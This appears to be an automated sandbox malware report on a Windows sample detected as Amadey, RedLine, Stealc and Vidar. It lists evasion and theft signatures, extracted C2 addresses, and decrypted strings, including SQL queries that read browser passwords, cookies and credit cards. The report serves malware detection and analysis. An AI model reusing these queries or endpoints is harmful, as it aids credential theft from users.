Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1483138
MD5:	8e3c2682f9743107cb2b3a3d15b072f5
SHA1:	660a9b6ad3f5cd1bd37e04015b25a893de4c5f90
SHA256:	6322686d71a40e20eca9b41af872049e06aab4439a2d06e607e9620decfec41d
Tags:	exe
Infos:

Detection

Amadey, Babadeda, RedLine, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected Amadeys stealer DLL

Yara detected Babadeda

Yara detected Powershell download and execute

Yara detected RedLine Stealer

Yara detected Stealc

Yara detected Vidar

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Found evasive API chain (may stop execution after checking locale)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

PE file contains section with special chars

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected TCP or UDP traffic on non-standard ports

Detected non-DNS traffic on DNS port

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops certificate files (DER)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains an invalid checksum

PE file contains more sections than normal

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: CurrentVersion Autorun Keys Modification

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/ https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Babadeda	According to PCrisk, Babadeda is a new sample in the crypters family, allowing threat actors to encrypt and obfuscate the malicious samples. The obfuscation allows malware to bypass the majority of antivirus protections without triggering any alerts. According to the researchers analysis, Babadeda leverages a sophisticated and complex obfuscation that shows a very low detection rate by anti-virus engines.	No Attribution	https://blog.morphisec.com/the-babadeda-crypter-targeting-crypto-nft-defi-communities	https://malpedia.caad.fkie.fraunhofer.de/details/win.babadeda

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://185.215.113.19/Vi9leo/index.php	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll;	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/sqlite3.dlleZ2B	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllk	Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phposition:	Avira URL Cloud: Label: malware

Found malware configuration

Source: 26.0.buildred.exe.800000.0.unpack	Malware Configuration Extractor: RedLine {"C2 url": ["185.215.113.9:9137"], "Bot Id": "Logs", "Authorization Header": "f3f88d8c3034a76ac8ad2a0de6407050"}
Source: 0.2.file.exe.2600e67.1.raw.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://85.28.47.31silence"}
Source: explorti.exe.3652.19.memstrmin	Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: ba77748b9b.exe.3144.22.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\1000003002\ead6a72944.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 22
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 08
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 20
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 24
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PathMatchSpecA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmStartSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmRegisterResources
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmGetList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RmEndSession
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_step
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_text
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_finalize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_close
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encrypted_key
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PATH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Init
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: NSS_Shutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11_Authenticate
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\ProgramData\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browser:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profile:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: url:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: login:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: password:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OperaGX
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TRUE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FALSE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: history
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: month:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: year:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: card:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Login Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Web Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: History
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: logins.json
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: usernameField
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: guid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: plugins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local State
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: firefox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wallets
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProductName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x32
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x64
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
